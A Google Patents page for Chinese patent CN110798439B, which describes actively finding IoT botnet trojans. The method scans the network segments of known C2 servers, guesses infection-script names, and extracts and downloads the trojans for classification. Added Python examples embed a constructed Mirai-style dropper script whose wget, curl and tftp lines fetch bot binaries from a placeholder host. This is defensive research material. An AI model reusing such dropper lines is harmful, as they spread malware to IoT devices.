CN110798439B - Method, equipment and storage medium for actively detecting internet-of-things botnet trojan - Google Patents
- Publication number: CN110798439B (application CN201811025294.8A)
- Authority
- CN
- China
- Prior art keywords: trojan, script, infection, information, internet
- Legal status: Active
Classifications
- H—ELECTRICITY; H04—ELECTRIC COMMUNICATION TECHNIQUE; H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
  - H04L63/00—Network architectures or network communication protocols for network security
    - H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
      - H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
      - H04L63/1441—Countermeasures against malicious traffic
        - H04L63/145—Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
  - H04L2463/00—Additional details relating to network architectures or network communication protocols for network security covered by H04L63/00
    - H04L2463/144—Detection or countermeasures against botnets
Abstract
The invention provides a method, equipment and a storage medium for actively detecting internet of things botnet trojans, wherein the method comprises the steps of obtaining the control node information of known internet of things botnet trojans; extracting the corresponding script file names as a script name dictionary set; actively carrying out full-port scanning detection on the high-frequency IP network segments to obtain port fingerprint information and screen out the important fingerprint information; carrying out automatic blind guessing of infection scripts on the target ports with important fingerprint information according to the script name dictionary set; extracting, from each automatic infection script obtained by blind guessing, the Trojan download link stored in it; and downloading the Trojan according to the Trojan download link, detecting, identifying and classifying the Trojan, and providing information for subsequent Trojan monitoring. The invention also provides corresponding equipment, a device and a storage medium. By the method, internet of things botnet trojans can be actively acquired, and effective information is provided for subsequent monitoring and threat intelligence acquisition.
Description
Technical Field
The invention relates to the field of network security, in particular to a method, equipment and a storage medium for actively detecting internet-of-things botnet trojans.
Background
The existing sources for capturing internet-of-things botnet trojans are basically either on-site forensics in the attack stage or honeypot capture in the infection stage of the trojan life cycle. Trojans acquired by on-site forensics suffer from serious lag and uncertainty. Although internet-of-things trojans captured by honeypots can be obtained early, in the infection stage and before on-site forensics, the result still falls short of optimal because honeypot capture is passive and its coverage is low; the honeypots may be unaware of security threat events as they occur, so timely early warning of the security threat situation is hard to achieve. Therefore, relying solely on on-site forensics or honeypot trojan capture cannot achieve effective coverage, cannot monitor high-level-threat internet-of-things botnets in time, and cannot trace the related network attack events.
Disclosure of Invention
Based on the problems, the invention provides a method, equipment and a storage medium for actively detecting internet of things botnet trojans, which can be used for acquiring automatic trojan infection scripts in time through actively detecting each port of the internet of things, pre-capturing a sample to the early stage of an infection stage and achieving higher detection coverage rate.
Firstly, the invention provides a method for actively detecting internet of things botnet trojans, which comprises the following steps:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
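The first three steps (extracting control node information, deduplicating script file names into a dictionary set, and sorting the control nodes into high-frequency IP network segments) are purely offline data processing. The following Python is an added example written for this page, not code from the patent; the sample records, the helper names (`parse_c2`, `build_script_dictionary`, `high_frequency_segments`) and the choice of /16 as the segment size (taken from the advantages paragraph below) are assumptions. The records use documentation addresses, not real indicators.

```python
from collections import Counter
from ipaddress import ip_address, ip_network
from urllib.parse import urlparse

# Constructed sample records (not real indicators). Each entry is what an
# analyst extracts from one known sample: the family, the hard-coded C2 as
# IP/Domain + Port, and the infection-script download link.
SAMPLES = [
    {"family": "Mirai",  "c2": "203.0.113.10:23",        "script_url": "http://203.0.113.10/bins.sh"},
    {"family": "Mirai",  "c2": "203.0.113.55:6667",      "script_url": "http://203.0.113.55/x86.sh"},
    {"family": "Gafgyt", "c2": "198.51.100.7:8080",      "script_url": "http://198.51.100.7/update.sh"},
    {"family": "Gafgyt", "c2": "198.51.100.200:23",      "script_url": "http://198.51.100.200/bins.sh"},
    {"family": "Mirai",  "c2": "192.0.2.44:1337",        "script_url": "http://192.0.2.44/mips.sh"},
    {"family": "Gafgyt", "c2": "c2.example.invalid:443", "script_url": "http://c2.example.invalid/update.sh"},
]


def parse_c2(c2):
    """Split an 'IP/Domain:Port' string into (host, port)."""
    host, _, port = c2.rpartition(":")
    return host, int(port)


def script_name(url):
    """File name component of an infection-script download link, or None."""
    name = urlparse(url).path.rsplit("/", 1)[-1]
    return name or None


def build_script_dictionary(samples):
    """S102: collect every script file name and deduplicate into a sorted set."""
    names = {script_name(s["script_url"]) for s in samples}
    names.discard(None)
    return sorted(names)


def segment16(host):
    """/16 segment containing an IP; None for domain names (they would need resolving first)."""
    try:
        ip_address(host)
    except ValueError:
        return None
    return str(ip_network(f"{host}/16", strict=False))


def high_frequency_segments(samples, min_count=2):
    """S103: rank /16 segments by how many samples have a C2 or hosting site inside them.

    Each sample counts a segment at most once, even when its C2 and its
    script host fall in the same segment.
    """
    counts = Counter()
    for s in samples:
        c2_host, _ = parse_c2(s["c2"])
        script_host = urlparse(s["script_url"]).hostname or ""
        for seg in {segment16(c2_host), segment16(script_host)} - {None}:
            counts[seg] += 1
    ranked = [(seg, n) for seg, n in counts.items() if n >= min_count]
    return sorted(ranked, key=lambda x: (-x[1], x[0]))


def group_by_family(samples):
    """Optional pre-step from the method: classify the samples by family before extraction."""
    groups = {}
    for s in samples:
        groups.setdefault(s["family"], []).append(s)
    return groups


if __name__ == "__main__":
    print("script name dictionary:", build_script_dictionary(SAMPLES))
    print("high-frequency /16 segments:", high_frequency_segments(SAMPLES))
    print("samples per family:", {k: len(v) for k, v in group_by_family(SAMPLES).items()})
```

Domain-name C2s are deliberately dropped from the segment count rather than resolved on the fly: a resolution done at analysis time may differ from the address the botnet used when the sample was active, so a real pipeline would record the IP observed at capture time alongside the domain.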
In the method, before extracting the information of each trojan control node, the method further includes: and classifying the Internet of things botnet trojans according to family versions.
In the method, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the method, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides equipment for actively detecting the internet of things botnet trojans, which comprises: a memory and a processor;
the memory stores a computer program operable on the processor, and a downloaded trojan program;
when the processor runs the computer program, the following steps are realized:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
In the device, before extracting the information of each Trojan control node, the steps further include: classifying the Internet of things botnet trojans according to family versions.
In the device, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the equipment, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides a device for actively detecting the internet of things botnet trojans, which comprises:
the information extraction module is used for acquiring the known internet of things botnet trojans and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
the script name dictionary set creation module extracts all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performs duplication removal to serve as a script name dictionary set;
the information sorting module is used for classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
the fingerprint information acquisition module is used for actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of the port;
the fingerprint information classification module is used for classifying the acquired fingerprint information and screening out important fingerprint information according to the importance degree;
the blind guessing module is used for carrying out automatic blind guessing of the infection script on the target port with the important fingerprint information according to the script name dictionary set;
the link extraction module is used for extracting Trojan download links stored in the automatic infection script aiming at the automatic infection script obtained by blind guess;
and the downloading module is used for downloading the Trojan according to the Trojan downloading link, detecting and identifying the Trojan, classifying the Trojan and providing information for subsequent Trojan monitoring.
The invention also proposes a non-transitory computer-readable storage medium having stored thereon a computer program which, when executed by a processor, implements a method of actively detecting internet of things botnet trojans as described in any one of the above.
The method has the advantages that IP network segment scanning of the hosting sites commonly used by internet of things botnets can be actively carried out through active detection, the automatic Trojan infection scripts are obtained in time by blind guessing, and sample capture is thus advanced to the early part of the infection stage with higher coverage. Meanwhile, the main scanning objects are the IP network segments where historical internet of things C2 servers or hosting sites are located, so scanning is accurately correlated to IP /16 network segments and scanning efficiency is improved. The method and process for capturing internet of things botnet trojans are optimized, and the efficiency and coverage of capturing internet of things trojans are effectively improved, providing effective information for subsequent monitoring of internet of things botnets and for threat intelligence acquisition.
Drawings
In order to more clearly illustrate the technical solutions of the present invention or the prior art, the drawings needed to be used in the description of the embodiments or the prior art will be briefly described below, and it is obvious that the drawings in the following description are only some embodiments described in the present invention, and it is obvious for those skilled in the art to obtain other drawings based on these drawings without creative efforts.
FIG. 1 is a flowchart of an embodiment of a method for actively detecting a botnet Trojan horse of the Internet of things according to the present invention;
FIG. 2 is a schematic structural diagram of an apparatus for actively detecting a botnet Trojan horse of the Internet of things according to the present invention;
FIG. 3 is a schematic structural diagram of a device for actively detecting internet of things botnet trojans.
Detailed Description
In order to make the technical solutions in the embodiments of the present invention better understood and make the above objects, features and advantages of the present invention more comprehensible, the technical solutions of the present invention are described in further detail below with reference to the accompanying drawings.
First, the invention provides a method for actively detecting internet of things botnet trojans, as shown in fig. 1, comprising the following steps:
s101: acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
known internet of things botnet trojans such as Mirai, Gafgyt and other internet of things family botnet trojans frequently used by hackers;
the control node information comprises C2(IP/Domain + Port) hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
s102: extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
s103: classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment; by the method, historical internet of things C2 high-frequency centralized IP network segments can be integrated;
s104: actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
s105: classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
This step strictly screens the fingerprint information of key service ports and eliminates junk fingerprint noise. For example, the Apache fingerprint data of port 80 is focused on, which provides accurate information for the later automatic infection script detection, while service fingerprint information that is not Apache is eliminated.
S106: carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
s107: aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
the automatic infection scripts store the download links (URLs) of the trojans, so the trojan download links in the automatic infection scripts must be automatically sorted and extracted, and the download links are provided for the automatic trojan download of the next stage;
s108: and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
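Steps S105 and S107 above are the two offline filtering steps of the procedure: screening the collected port fingerprints down to the important ones (the Apache-on-port-80 case the text gives) and pulling the trojan download links out of an infection script. The Python below is an added example for this page, not the patent's code or any project's; the banners, the infection script and the function names (`classify`, `screen_important`, `extract_download_links`) are constructed assumptions. It goes slightly beyond the text by also handling the busybox-style `tftp -g -r FILE HOST` download form, which has no URL syntax and would be missed by a plain URL regex.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class Fingerprint:
    host: str
    port: int
    banner: str   # decoded text returned by the port during S104


# Constructed banners standing in for what the full-port scan collects (not real hosts).
FINGERPRINTS = [
    Fingerprint("203.0.113.10", 80, "HTTP/1.1 200 OK\r\nServer: Apache/2.4.29 (Ubuntu)\r\n"),
    Fingerprint("203.0.113.10", 22, "SSH-2.0-OpenSSH_7.6p1"),
    Fingerprint("203.0.113.55", 80, "HTTP/1.1 403 Forbidden\r\nServer: nginx/1.14.0\r\n"),
    Fingerprint("203.0.113.99", 80, "HTTP/1.0 200 OK\r\nServer: Apache\r\n"),
    Fingerprint("203.0.113.120", 8080, "HTTP/1.1 200 OK\r\nServer: SimpleHTTP/0.6 Python/3.6.9\r\n"),
]

SERVER_RE = re.compile(r"^Server:\s*([^\r\n]+)", re.IGNORECASE | re.MULTILINE)


def classify(fp):
    """S105: label the service behind a banner; anything unrecognised is treated as noise."""
    if fp.banner.startswith("SSH-"):
        return "ssh"
    if fp.banner.startswith("HTTP/"):
        m = SERVER_RE.search(fp.banner)
        server = m.group(1).lower() if m else ""
        if server.startswith("apache"):
            return "apache"
        if server.startswith("nginx"):
            return "nginx"
        return "other-http"
    return "unknown"


def screen_important(fps, port=80, service="apache"):
    """Keep only the fingerprints the text calls important (Apache on port 80 by default)."""
    return [fp for fp in fps if fp.port == port and classify(fp) == service]


# Constructed infection script in the style the text describes (not a real sample).
INFECTION_SCRIPT = """#!/bin/sh
cd /tmp || cd /var/run
wget http://203.0.113.10/bins/mips -O mips
wget -q http://203.0.113.10/bins/arm7 -O arm7 || curl -O http://203.0.113.10/bins/arm7
tftp -g -r x86 203.0.113.10
busybox wget http://203.0.113.10:8080/bins/x86 -O x86
"""

URL_RE = re.compile(r"https?://[^\s'\";|&<>]+")
# 'tftp -g -r FILE HOST' carries no URL, so it is rebuilt as tftp://HOST/FILE.
TFTP_RE = re.compile(r"\btftp\s+-g\s+-r\s+(\S+)\s+(\S+)")


def extract_download_links(script):
    """S107: every trojan download link in the script, deduplicated in order of appearance."""
    links = []
    for line in script.splitlines():
        found = URL_RE.findall(line)
        found += [f"tftp://{host}/{name}" for name, host in TFTP_RE.findall(line)]
        for url in found:
            if url not in links:
                links.append(url)
    return links


def link_hosts(links):
    """Hosts serving the binaries; these feed back into the next round of segment selection."""
    return {urlparse(u).hostname for u in links}


if __name__ == "__main__":
    for fp in screen_important(FINGERPRINTS):
        print("important:", fp.host, fp.port, classify(fp))
    links = extract_download_links(INFECTION_SCRIPT)
    print("download links:", links)
    print("hosting hosts:", link_hosts(links))
```

The extracted links are the hand-off to S108: each one is fetched in an isolated analysis environment, hashed and classified, and the hosting hosts returned by `link_hosts` are added to the control node information so that the high-frequency segment list stays current.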
In the method, before extracting the information of each trojan control node, the method further includes: and classifying the Internet of things botnet trojans according to family versions.
In the method, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the method, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides equipment for actively detecting the botnet trojans of the internet of things, which comprises the following components as shown in fig. 2: a memory 201 and a processor 202;
the memory stores a computer program operable on the processor, and a downloaded trojan program;
when the processor runs the computer program, the following steps are realized:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
carrying out automatic blind guess of infection scripts on a target port with important fingerprint information according to the script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
In the device, before extracting the information of each Trojan control node, the steps further include: classifying the Internet of things botnet trojans according to family versions.
In the device, the active full-port scanning detection is performed on the high-frequency IP network segment to acquire the fingerprint information of the port, and the method specifically comprises the following steps: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
In the equipment, the automatic infection script blind guess specifically comprises the following steps: and performing enumeration detection on the scripts possibly existing in the target port through an existing script name dictionary set.
The invention also provides a device for actively detecting the internet of things botnet trojans, which comprises the following components as shown in fig. 3:
the information extraction module 301 is used for acquiring the known internet of things botnet trojans and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
a script name dictionary set creating module 302 for extracting all infection script file names in the automatic Internet of things Trojan horse infection script download link and removing duplication to serve as a script name dictionary set;
the information sorting module 303 is used for classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
the fingerprint information acquisition module 304 is used for actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of the port;
a fingerprint information classification module 305 for classifying the acquired fingerprint information and screening out important fingerprint information according to the importance degree;
the blind guessing module 306 is used for carrying out automatic blind guessing of the infection script on the target port with the important fingerprint information according to the script name dictionary set;
a link extraction module 307, which extracts the trojan download link stored in the automatic infection script aiming at the automatic infection script obtained by blind guess;
and the downloading module 308 downloads the trojan according to the trojan downloading link, detects and identifies the trojan, classifies the trojan, and provides information for subsequent trojan monitoring.
The invention also proposes a non-transitory computer-readable storage medium having stored thereon a computer program which, when executed by a processor, implements a method of actively detecting internet of things botnet trojans as described in any one of the above.
From the above description of the embodiments, it is clear to those skilled in the art that the present invention can be implemented by software plus necessary general hardware platform. With this understanding in mind, the technical solutions of the present invention may be embodied in the form of a software product, which can be stored in a storage medium, or a part thereof that contributes to the prior art.
The embodiments in the present specification are described in a progressive manner, and the same and similar parts among the embodiments are referred to each other, and each embodiment focuses on the differences from the other embodiments. In particular, for the system embodiment, since it is substantially similar to the method embodiment, the description is simple, and for the relevant points, reference may be made to the partial description of the method embodiment.
While the present invention has been described with respect to the embodiments, those skilled in the art will appreciate that there are numerous variations and permutations of the present invention without departing from the spirit of the invention, and it is intended that the appended claims cover such variations and modifications as fall within the true spirit of the invention.
Claims (8)
1. A method for actively detecting Internet of things botnet trojans is characterized by comprising the following steps:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
according to the script name dictionary set, carrying out automatic infection script blind guessing on a target port with important fingerprint information, wherein the automatic infection script blind guessing specifically comprises the following steps: enumerating and detecting scripts possibly existing in a target port through an existing script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
2. The method of claim 1, further comprising, prior to said extracting each trojan control node information: and classifying the Internet of things botnet trojans according to family versions.
3. The method of claim 1, wherein the active full port scanning probing of the high frequency IP network segment to obtain the fingerprint information of the port specifically comprises: and establishing communication with each port of the high-frequency IP network segment respectively, collecting returned information, and extracting fingerprint information.
4. An apparatus for actively detecting Internet of things botnet trojans, characterized by comprising: a memory and a processor;
the memory stores a computer program operable on the processor, and a downloaded trojan program;
when the processor runs the computer program, the following steps are realized:
acquiring the known internet of things botnet trojans, and extracting control node information of each trojan;
the control node information comprises C2 hard coded in the Trojan, an automatic Internet of things Trojan infection script download link and an IP network segment;
extracting all infection script file names in the automatic Internet of things Trojan horse infection script downloading link, and performing duplication removal to obtain a script name dictionary set;
classifying and sorting the extracted information of each Trojan control node to obtain a high-frequency IP network segment;
actively carrying out full-port scanning detection on the high-frequency IP network segment to acquire the fingerprint information of a port;
classifying the acquired fingerprint information, and screening out important fingerprint information according to the importance degree;
according to the script name dictionary set, carrying out automatic infection script blind guessing on a target port with important fingerprint information, wherein the automatic infection script blind guessing specifically comprises the following steps: enumerating and detecting scripts possibly existing in a target port through an existing script name dictionary set;
aiming at the automatic infection script obtained by blind guessing, extracting a Trojan download link stored in the automatic infection script;
and downloading the Trojan according to the Trojan downloading link, detecting and identifying, classifying the Trojan, and providing information for subsequent Trojan monitoring.
5. The device of claim 4, further comprising, before said extracting the control node information of each trojan: classifying the internet-of-things botnet trojans according to family version.
6. The device of claim 4, wherein actively performing full-port scanning detection on the high-frequency IP network segment to obtain the port fingerprint information specifically comprises: establishing communication with each port of the high-frequency IP network segment in turn, collecting the returned information, and extracting the fingerprint information from it.
7. An apparatus for actively detecting internet-of-things botnet trojans, characterized in that it comprises:
an information extraction module, used for acquiring known internet-of-things botnet trojans and extracting the control node information of each trojan;
the control node information comprises the C2 hard-coded in the trojan, the download link of the automatic internet-of-things trojan infection script, and the IP network segment;
a script name dictionary set creation module, which extracts all infection script file names from the automatic internet-of-things trojan infection script download links and de-duplicates them to serve as the script name dictionary set;
an information sorting module, used for classifying and sorting the extracted control node information of each trojan to obtain the high-frequency IP network segments;
a fingerprint information acquisition module, used for actively performing full-port scanning detection on the high-frequency IP network segments to acquire port fingerprint information;
a fingerprint information classification module, used for classifying the acquired fingerprint information and screening out the important fingerprint information according to its degree of importance;
a blind guessing module, which performs automatic infection script blind guessing on the target ports that have important fingerprint information according to the script name dictionary set, wherein the automatic infection script blind guessing specifically comprises: enumerating and detecting the scripts that may exist on a target port by means of the existing script name dictionary set;
a link extraction module, used for extracting, for the automatic infection script obtained by blind guessing, the trojan download link stored in the automatic infection script;
and a download module, used for downloading the trojan according to the trojan download link, detecting and identifying the trojan, classifying it, and providing information for subsequent trojan monitoring.
8. A non-transitory computer readable storage medium having stored thereon a computer program, which when executed by a processor, implements the method of actively detecting internet of things botnet trojans of any one of claims 1-3.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201811025294.8A CN110798439B (en) | 2018-09-04 | 2018-09-04 | Method, equipment and storage medium for actively detecting internet-of-things botnet trojan |
Publications (2)
Publication Number | Publication Date |
---|---|
CN110798439A (en) | 2020-02-14 |
CN110798439B (en) | 2022-04-19 |
Family ID=69425767
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201811025294.8A Active CN110798439B (en) | 2018-09-04 | 2018-09-04 | Method, equipment and storage medium for actively detecting internet-of-things botnet trojan |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN110798439B (en) |
Citations (9)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN101651579A (en) * | 2009-09-15 | 2010-02-17 | 成都市华为赛门铁克科技有限公司 | Method and gateway device for identifying Botnet |
CN101673326A (en) * | 2008-09-11 | 2010-03-17 | 北京理工大学 | Method for detecting web page Trojan horse based on program execution characteristics |
CN102546298A (en) * | 2012-01-06 | 2012-07-04 | 北京大学 | Botnet family detection method based on active probing |
CN102955913A (en) * | 2011-08-25 | 2013-03-06 | 腾讯科技(深圳)有限公司 | Method and system for detecting hung Trojans of web page |
CN103973664A (en) * | 2013-01-28 | 2014-08-06 | 信息安全有限公司 | Webshell detection and response system |
CN106603521A (en) * | 2016-12-09 | 2017-04-26 | 北京安天电子设备有限公司 | Network control node detection method and system |
CN106982188A (en) * | 2016-01-15 | 2017-07-25 | 阿里巴巴集团控股有限公司 | The detection method and device in malicious dissemination source |
CN107463844A (en) * | 2016-06-06 | 2017-12-12 | 国家计算机网络与信息安全管理中心 | WEB Trojan detecting methods and system |
CN108156174A (en) * | 2018-01-15 | 2018-06-12 | 深圳市联软科技股份有限公司 | Botnet detection method, device, equipment and medium based on the analysis of C&C domain names |
Family Cites Families (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US9142102B2 (en) * | 2013-07-02 | 2015-09-22 | Icf International | Method and apparatus for visualizing network security alerts |
2018
- 2018-09-04 CN CN201811025294.8A patent/CN110798439B/en active Active
Also Published As
Publication number | Publication date |
---|---|
CN110798439A (en) | 2020-02-14 |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
| PB01 | Publication | |
| SE01 | Entry into force of request for substantive examination | |
| GR01 | Patent grant | |